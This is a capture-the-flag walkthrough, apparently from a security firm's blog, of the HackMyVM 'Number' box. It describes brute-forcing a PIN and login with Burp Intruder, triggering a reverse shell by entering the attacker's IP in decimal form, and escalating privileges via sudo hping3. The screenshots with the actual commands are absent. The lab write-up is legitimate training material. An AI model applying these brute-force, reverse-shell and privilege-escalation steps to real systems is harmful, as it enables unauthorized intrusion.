HackMyVM Number Walkthrough

    Another cyber range appeared recently and it's similar to Vulnhub where people upload VM's, you download them, and get flags.  There's a points system like TryHackMe and HackTheBox which is a great way to gamify the environment.  I was curious to play and I download Number. 

    The box does not have a description other than it states that it's a Medium level system.

    We kick off with Nmap:



    We find a web port.  Enumerating with Nikto:


    Then with GoBuster:



    We find a login:



    But after a few seconds of looking around, I feel like there's something missing.  We check out /pin:



    We capture a request in Burp and we send it to Intruder:



    Using Sniper, we'll attempt to brute force the pin:



    Using seq -w 0000 4444, I create a list of numbers for our brute force:



    Adding in the error message:


     
    After a few seconds (Burp Pro), we learn the pin is 4444:



    We go back to the pin page and enter our pin:



    That doesn't help us:



    We move back to Sniper thinking that 4444 is our password:



    I'm just using a subset of RockYou as my wordlist, I think it's 100k lines:



    Entering the error message:



    After a bit, we uncover the username:  melon



    Back to the login:



    We are then presented with yet another form:



    We enter an IP address but it only accepts numbers:



    Just a quick sanity check:



    It likes numbers, not decimal points.  We can convert an IP to decimal:



    I enter the decimal equivalent of my attacking machine:



    Since it's spawning a reverse shell, I setup tcpdump because I need to know which port:



    When we hit submit, we see an inbound connection on the familiar 4444.  We setup a handler:



    After we submit again, we catch a shell.  When we clean is up, we enter into the melon home directory and we find:



    When cat look at flag.sh, we find:



    This won't work for us since we're not the user melon.  Since we're unable to SSH, I assume the password has to be simple. 



    You can read the flag at this point without the use of the script.  Checking sudo privileges:



    We elevate using hping3 and we only have one last thing to do:



    Cybersecurity solutions for small businesses.

    info@sevenlayers.com
    877.468.0911

    © 2021 Seven Layer Networks, Inc. | All rights reserved.